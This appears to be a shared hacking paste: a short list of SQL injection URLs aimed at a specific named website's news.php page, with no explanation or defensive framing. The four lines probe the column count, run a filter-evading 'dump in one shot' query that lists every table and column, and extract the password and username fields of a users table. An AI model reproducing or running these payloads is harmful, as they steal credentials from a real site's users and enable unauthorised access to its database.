
Query https://patshortt.com/news.php?id=63%27/**8**/and/**8**/0+/**8**/UniOn/**8**/sEleCT/**8**/1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
DIOS : https://patshortt.com/news.php?id=63%27/**8**/and/**8**/0+/**8**/UniOn/**8**/sEleCT/**8**/1,2,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x),4,5,6,7,8,9,10,11,12,13,14--+
DUMP :: https://patshortt.com/news.php?id=63%27/**8**/and/**8**/0+/**8**/UniOn/**8**/sEleCT/**8**/1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,password))))x),4,5,6,7,8,9,10,11,12,13,14--+
DUMP :: https://patshortt.com/news.php?id=63%27/**8**/and/**8**/0+/**8**/UniOn/**8**/sEleCT/**8**/1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x3c6c693e,username))))x),4,5,6,7,8,9,10,11,12,13,14--+
